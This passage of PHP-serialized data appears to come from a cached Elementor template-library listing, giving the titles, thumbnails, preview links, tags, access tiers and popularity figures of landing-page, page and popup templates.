website\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:625;s:11:\"trend_index\";i:309;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:210;a:21:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:20394;s:5:\"title\";s:30:\"Time Management &#8211; Events\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/10/Time-Management-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884077;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/time-management-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:17:\"[\"Landing Pages\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:211;a:21:{s:4:\"tmpl\";i:1229;s:2:\"id\";i:21118;s:5:\"title\";s:28:\"Contact &#8211; Plants Store\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/12-Contact-Plants-Store.jpg\";s:12:\"tmpl_created\";i:1638802472;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/contact-plants-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:40:\"[\"Contact\",\"Info\",\"Plant\",\"Testimonial\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:212;a:21:{s:4:\"tmpl\";i:893;s:2:\"id\";i:11822;s:5:\"title\";s:30:\"Full Screen | Menu | Portfolio\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/09/PopUp_small.png\";s:12:\"tmpl_created\";i:1569429896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/full-screen-menu-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:626;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:213;a:21:{s:4:\"tmpl\";i:1203;s:2:\"id\";i:18591;s:5:\"title\";s:28:\"Coffee Sale &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280-7.png\";s:12:\"tmpl_created\";i:1633877319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/coffee-sale-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:33:\"[\"Coffee\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:214;a:21:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:21184;s:5:\"title\";s:28:\"Dental Care &#8211; Services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/14-Services-Dental-Care.jpg\";s:12:\"tmpl_created\";i:1638807148;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dental-care-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Dental\",\"Medical\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:215;a:21:{s:4:\"tmpl\";i:1064;s:2:\"id\";i:15580;s:5:\"title\";s:31:\"Fullscreen | Menu | Travel Blog\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1606215358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fullscreen-menu-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:348;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:216;a:21:{s:4:\"tmpl\";i:1133;s:2:\"id\";i:16645;s:5:\"title\";s:28:\"Headphones &#8211; eCommerce\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_headphones.png\";s:12:\"tmpl_created\";i:1609944115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/commerce-headphones/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:39:\"[\"Ecommerce\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:87;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:217;a:21:{s:4:\"tmpl\";i:1442;s:2:\"id\";i:24584;s:5:\"title\";s:27:\"Wireframe &#8211; Pricing 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Pricing-1.jpg\";s:12:\"tmpl_created\";i:1653989152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-pricing-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"Booking\",\"Business\",\"Clients\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Online Service\",\"Pricing\",\"Products\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:218;a:21:{s:4:\"tmpl\";i:1138;s:2:\"id\";i:16762;s:5:\"title\";s:25:\"Conference &#8211; Events\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Conference.png\";s:12:\"tmpl_created\";i:1610455119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/conference-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:60:\"[\"Conference\",\"Convention\",\"Event\",\"Events\",\"Landing Pages\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:705;s:11:\"trend_index\";i:216;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:219;a:21:{s:4:\"tmpl\";i:1438;s:2:\"id\";i:24539;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-2.jpg\";s:12:\"tmpl_created\";i:1653989019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"Business\",\"Contact\",\"Footer\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:220;a:21:{s:4:\"tmpl\";i:981;s:2:\"id\";i:13281;s:5:\"title\";s:37:\"Hello Bar | Contact | Interior Design\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp.png\";s:12:\"tmpl_created\";i:1586148801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/hello-bar-contact-interior-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:19:\"[\"Interior Design\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:763;s:11:\"trend_index\";i:679;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:221;a:21:{s:4:\"tmpl\";i:1052;s:2:\"id\";i:15259;s:5:\"title\";s:31:\"Hello Bar | Menu | Psychologist\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Menu-PopUp.png\";s:12:\"tmpl_created\";i:1600170209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/hello-bar-menu-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:739;s:11:\"trend_index\";i:583;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:222;a:21:{s:4:\"tmpl\";i:1434;s:2:\"id\";i:24494;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1.jpg\";s:12:\"tmpl_created\";i:1653988874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Business\",\"Faq\",\"Footer\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:223;a:21:{s:4:\"tmpl\";i:1194;s:2:\"id\";i:18701;s:5:\"title\";s:32:\"Digital Course &#8211; eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280.jpg\";s:12:\"tmpl_created\";i:1618995134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/digital-course-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Ecommerce\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:224;a:21:{s:4:\"tmpl\";i:1192;s:2:\"id\";i:18612;s:5:\"title\";s:34:\"Bag Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bag-Product.jpeg\";s:12:\"tmpl_created\";i:1618395406;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bag-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:61:\"[\"Bag\",\"Ecommerce\",\"Landing Pages\",\"Product\",\"Sale\",\"Travel\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:875;s:11:\"trend_index\";i:605;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:225;a:21:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:21083;s:5:\"title\";s:26:\"Conference &#8211; Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/10-Contact-Conference.jpg\";s:12:\"tmpl_created\";i:1638799208;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/conference-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:44:\"[\"Conference\",\"Contact\",\"Form\",\"Info\",\"Map\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:226;a:21:{s:4:\"tmpl\";i:1193;s:2:\"id\";i:18644;s:5:\"title\";s:37:\"Camera Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/camera_sale_featured-img.jpg\";s:12:\"tmpl_created\";i:1618396388;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/camera-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Camera\",\"Ecommerce\",\"Landing Pages\",\"Photography\",\"Sale\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:873;s:11:\"trend_index\";i:535;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:227;a:21:{s:4:\"tmpl\";i:951;s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:734;s:11:\"trend_index\";i:686;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:228;a:21:{s:4:\"tmpl\";i:1222;s:2:\"id\";i:20960;s:5:\"title\";s:26:\"Travel Agency &#8211; Home\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/5-Home-Travel-Agency.jpg\";s:12:\"tmpl_created\";i:1638788432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/travel-agency-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Adventures\",\"Experience\",\"Explore\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:229;a:21:{s:4:\"tmpl\";i:1196;s:2:\"id\";i:18815;s:5:\"title\";s:25:\"Car Wash &#8211; Business\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Car-Wash.png\";s:12:\"tmpl_created\";i:1621336431;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/car-wash-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:45:\"[\"Business\",\"car\",\"Discount\",\"Landing Pages\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:230;a:21:{s:4:\"tmpl\";i:1242;s:2:\"id\";i:21473;s:5:\"title\";s:40:\"Architecture Photography &#8211; Gallery\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/20-Gallery-Architecture-Photography.jpg\";s:12:\"tmpl_created\";i:1638822115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/architecture-photography-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:52:\"[\"Architecture\",\"Gallery\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:231;a:21:{s:4:\"tmpl\";i:1015;s:2:\"id\";i:14067;s:5:\"title\";s:37:\"Slide In | Japanese restaurant | Menu\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Menu-Pop-Up-Small.jpg\";s:12:\"tmpl_created\";i:1592290352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/slide-in-japanese-restaurant-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:650;s:11:\"trend_index\";i:565;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:232;a:21:{s:4:\"tmpl\";i:923;s:2:\"id\";i:12229;s:5:\"title\";s:33:\"Slide In | Law Firm | Information\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/popup.png\";s:12:\"tmpl_created\";i:1572847842;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-law-firm-information/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:547;s:11:\"trend_index\";i:413;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:233;a:21:{s:4:\"tmpl\";i:1198;s:2:\"id\";i:18824;s:5:\"title\";s:33:\"Design School &#8211; Coming Soon\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/05/250x280-1.png\";s:12:\"tmpl_created\";i:1621336756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/design-school-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:49:\"[\"Coming Soon\",\"Design\",\"Landing Pages\",\"School\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:234;a:21:{s:4:\"tmpl\";i:1236;s:2:\"id\";i:21259;s:5:\"title\";s:28:\"3D Designer &#8211; Projects\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/24-Projects-3D-Designer.jpg\";s:12:\"tmpl_created\";i:1638819185;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/3d-designer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"3D\",\"Creative Portfolio\",\"Design\",\"Designer\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:235;a:21:{s:4:\"tmpl\";i:1028;s:2:\"id\";i:14827;s:5:\"title\";s:39:\"Slide-In | Contact | Luxury Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/PopUp.png\";s:12:\"tmpl_created\";i:1595323523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/slide-in-contact-luxury-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:559;s:11:\"trend_index\";i:284;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:236;a:21:{s:4:\"tmpl\";i:1197;s:2:\"id\";i:18819;s:5:\"title\";s:27:\"Dog Walker &#8211; 